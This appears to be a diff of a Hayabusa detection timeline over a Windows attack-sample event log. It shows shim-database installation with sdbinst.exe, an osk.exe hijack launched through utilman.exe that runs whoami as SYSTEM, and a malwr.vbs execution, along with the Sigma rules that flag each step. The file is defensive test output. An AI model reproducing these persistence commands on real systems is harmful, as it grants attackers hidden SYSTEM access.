+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
